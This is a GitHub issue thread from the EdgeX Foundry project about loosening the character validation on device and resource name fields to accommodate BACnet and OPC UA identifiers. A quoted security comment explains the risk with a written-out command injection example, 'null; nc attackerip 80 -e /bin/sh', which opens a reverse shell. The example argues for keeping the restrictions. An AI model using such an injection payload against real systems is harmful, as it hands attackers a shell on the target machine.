Reduce the character restriction of the name field
#750
Comments
|
We should probably document the various places that names crop up in, and what limitations / workarounds are implied. |
Very good point!! Note the Redis Pub/Sub implementation converts |
|
I am in favor of configuration as follows:
I am assuming this configuration is for core-metadata and applies to Device, DeviceProfile and DeviceResource names. |
|
FYI, we use this name validation in many other DTOs. |
important feedback from @bnevis-i via email:There is always a risk of command injection of using characters such as $, particularly if a device service ever invoked system() or equivalent as part of its processing. For example (used to be with old school httpd that HTTP headers got reflected in environment variables): mkdir /dev/DEVICE_NAME where DEVICE_NAME is "$HTTP_X_HACKME" and the HTTP request had an X_HACKME header that contained "null; nc attackerip 80 -e /bin/sh" Then you get mkdir /dev/null; nc attackerip 80 -e /bin/sh which gives the attacker access to a shell on your box. This kind of attack is particularly insidious because you can do all the right things, and then call some third party code that you don't know about that just totally blows it. |
|
To follow up: If "$" is legal for BACnet identifiers, then only allow "$" for BACnet devices, for example. Or pull the usable character set out into configuration, where the user can override it for corner cases like this. Removing all restrictions entirely is just asking for trouble. |
cloudxxx8
changed the title
name fieldname field
Add characters :;= to reduce the character restriction. Close edgexfoundry#750 Signed-off-by: bruce <weichou1229@gmail.com>
Add characters :;= to reduce the character restriction. Close edgexfoundry#750 Signed-off-by: bruce <weichou1229@gmail.com>
Add characters :;= to reduce the character restriction. - In BACNet protocol, user might combine object type and property as the resourceName, for example: analog_input_0:present-value - In OPC_UA protocol, user might use NodeId as the resourceName, for example: ns=10;s=Hello:World Close edgexfoundry#750 Signed-off-by: bruce <weichou1229@gmail.com>
Add characters :;= to reduce the character restriction. - In BACNet protocol, the user might combine object type and property as the resourceName, for example, analog_input_0:present-value - In OPC_UA protocol, user might use NodeId as the resourceName, for example, ns=10;s=Hello:World Close edgexfoundry#750 Signed-off-by: bruce <weichou1229@gmail.com>
Add characters :;= to reduce the character restriction. - In BACNet protocol, the user might combine object type and property as the resourceName, for example, analog_input_0:present-value - In OPC_UA protocol, the user might use NodeId as the resourceName, for example, ns=10;s=Hello:World Close edgexfoundry#750 Signed-off-by: bruce <weichou1229@gmail.com>
🚀 Feature Request
Relevant Package [REQUIRED]
This feature request is for all servicesDescription [REQUIRED]
Driven by edgexfoundry/edgex-go#4053
We added
ValidateDtoRFC3986UnreservedCharsfunc to check if DTO's name pointer value only contains unreserved characters as defined in https://tools.ietf.org/html/rfc3986#section-2.3unreserved characters= ALPHA / DIGIT / "-" / "." / "_" / "~"
Also due to names used in topics for Redis Pub/Sub, "." is not allowed
However, we noticed colon
:is a standard character of BACnet device resource. It might look likeabc:defin the resource name.Furthermore, a customer told us their device might contain space and dollar sign in the resource name.
Thus, I propose to remove this restriction.
Users can still use URL escape to use those characters to call the API.
Our go-mod-messaging might also help escape those characters
Describe the solution you'd like
Remove
edgex-dto-rfc3986-unreserved-charsvalidation tag from all thenamefields.The text was updated successfully, but these errors were encountered: